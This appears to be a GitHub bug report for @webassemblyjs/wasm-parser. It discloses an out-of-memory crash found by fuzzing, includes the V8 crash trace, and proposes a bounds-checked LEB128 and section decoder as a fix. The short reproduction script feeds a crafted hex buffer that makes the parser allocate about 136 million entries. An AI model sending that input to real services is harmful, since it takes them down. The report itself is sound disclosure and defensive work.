webassemblyjs
[wasm-parser] Bug leading to OOM/DoS
Hi,
During fuzzing with jsfuzz, I found the following bug leading to a memory OOM, i.e. a DoS of the nodejs process:
Error:
$ nodejs crash_wasm_parser_OOM.js
<--- Last few GCs --->
[21833:0x3ed48c0] 1757 ms: Scavenge 1150.1 (1182.9) -> 1150.1 (1182.9) MB, 55.5 / 0.0 ms (average mu = 1.000, current mu = 1.000) allocation failure
[21833:0x3ed48c0] 3055 ms: Mark-sweep 1723.9 (1756.7) -> 1711.0 (1744.6) MB, 507.4 / 0.0 ms (+ 38.5 ms in 11 steps since start of marking, biggest step 5.7 ms, walltime since start of marking 2873 ms) (average mu = 1.000, current mu = 1.000) allocati
<--- JS stacktrace --->
==== JS stack trace =========================================
0: ExitFrame [pc: 0x1374fd9]
Security context: 0x06c8e73808a1 <JSObject>
1: push [0x6c8e7391079](this=0x1b11adcdc4a1 <JSArray[112813858]>,0x249ba0fc04a9 <undefined>)
2: readBytesAtOffset(aka readBytesAtOffset) [0x1b11adcdc661] [/XXX/node_modules/@webassemblyjs/wasm-parser/lib/decoder.js:~125] [pc=0x394ada845390](this=0x249ba0fc04a9 <undefined>,17,136278235)
3: readUTF8String(aka re...
FATAL ERROR: invalid array length Allocation failed - JavaScript heap out of memory
Reproduction
const parser = require("@webassemblyjs/wasm-parser");
// Crafted input: a valid wasm header (magic + version 1) followed by malformed section bytes
const buf = Buffer.from('0061736d010000000100000040dbe1fd40db01fe331a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a5e1a1a1a1a1a1a1a', 'hex');
parser.decode(buf, {});
The module bytecode is not a valid wasm module, so it should be rejected instead.
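The stack trace shows readUTF8String handing readBytesAtOffset a length of 136278235 at offset 17, and pushing that many entries into an array. That length is simply the unsigned LEB128 value encoded by the four bytes db e1 fd 40 at offset 13 of the reproduction buffer, so the parser is sizing an allocation from attacker-controlled bytes without first comparing it with what remains in the buffer. The block below is an added example written for this report, not code from @webassemblyjs/wasm-parser: it is a length-checked version of the two primitives named in the trace (the function names mirror the trace, the bodies are my own) plus a small section walker that uses them. The "valid" module is constructed here for the example (header plus one empty custom section named "name").

```javascript
// Added example, not code from @webassemblyjs/wasm-parser. Function names
// mirror the stack trace in the issue; the implementations are my own.

// Decode an unsigned LEB128 u32 at `offset`. Throws on truncation or on a
// value that does not fit in 32 bits instead of reading past the buffer.
function readU32Leb(buf, offset) {
  let value = 0;
  let pos = offset;
  for (let shift = 0; shift < 35; shift += 7) {
    if (pos >= buf.length) {
      throw new RangeError(`LEB128 at offset ${offset} runs past end of buffer`);
    }
    const byte = buf[pos++];
    // Multiply rather than shift: JS bitwise ops truncate to 32-bit signed ints.
    value += (byte & 0x7f) * 2 ** shift;
    if ((byte & 0x80) === 0) {
      if (value > 0xffffffff) {
        throw new RangeError(`LEB128 at offset ${offset} exceeds u32`);
      }
      return { value, nextOffset: pos };
    }
  }
  throw new RangeError(`LEB128 at offset ${offset} is longer than 5 bytes`);
}

// The check the crash is missing: a declared length is only honoured once it
// has been compared with what is actually left in the buffer, so no
// allocation is ever sized by an unverified value from the input.
function readBytesAtOffset(buf, offset, length) {
  if (offset < 0 || offset > buf.length || length > buf.length - offset) {
    const remaining = Math.max(0, buf.length - offset);
    throw new RangeError(`need ${length} bytes at offset ${offset}, only ${remaining} remain`);
  }
  return buf.subarray(offset, offset + length);
}

// Length-prefixed UTF-8 string (the encoding of custom-section names). Valid
// UTF-8 is enforced by a decode/re-encode round trip: invalid sequences come
// back as U+FFFD and no longer compare equal to the input bytes.
function readUTF8String(buf, offset) {
  const { value: length, nextOffset } = readU32Leb(buf, offset);
  const bytes = readBytesAtOffset(buf, nextOffset, length);
  const text = bytes.toString('utf8');
  if (!Buffer.from(text, 'utf8').equals(bytes)) {
    throw new Error(`invalid UTF-8 at offset ${nextOffset}`);
  }
  return { value: text, nextOffset: nextOffset + length };
}

// Walk the module: magic, version, then (id, size, payload) sections. Every
// size is bounds-checked before the payload is touched, and a custom section's
// name is read from its own payload only, so it cannot reach outside it.
function decodeModule(buf) {
  const MAGIC = Buffer.from('0061736d', 'hex');
  const VERSION = Buffer.from('01000000', 'hex');
  if (buf.length < 8 || !buf.subarray(0, 4).equals(MAGIC)) {
    throw new Error('not a wasm module: bad magic');
  }
  if (!buf.subarray(4, 8).equals(VERSION)) {
    throw new Error('unsupported wasm version');
  }
  const sections = [];
  let pos = 8;
  while (pos < buf.length) {
    const id = buf[pos++];
    if (id > 12) throw new Error(`unknown section id ${id} at offset ${pos - 1}`);
    const { value: size, nextOffset } = readU32Leb(buf, pos);
    const payload = readBytesAtOffset(buf, nextOffset, size);
    pos = nextOffset + size;
    const section = { id, size };
    if (id === 0) section.name = readUTF8String(payload, 0).value;
    sections.push(section);
  }
  return sections;
}

// The reproduction bytes from this issue.
const REPRO = Buffer.from('0061736d010000000100000040dbe1fd40db01fe331a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a5e1a1a1a1a1a1a1a', 'hex');
// Constructed for this example: header plus one empty custom section named "name".
const VALID = Buffer.from('0061736d01000000' + '00' + '05' + '04' + '6e616d65', 'hex');

// Returns the LEB128 value at offset 13 of the reproduction (the length seen in
// the trace) and the error message the checked decoder rejects the input with.
function describeRepro() {
  const lebValue = readU32Leb(REPRO, 13).value;
  let rejected = null;
  try { decodeModule(REPRO); } catch (e) { rejected = e.message; }
  return { lebValue, rejected };
}

console.log(describeRepro());
console.log(decodeModule(VALID));
```

With the check in place the reproduction fails fast with a RangeError at the first section whose declared size or string length exceeds the remaining bytes, rather than growing an array of 136 million entries until V8 aborts. The same comparison should guard every length read from the module (section sizes, vector counts, string lengths, data segment sizes), since each is independently attacker-controlled.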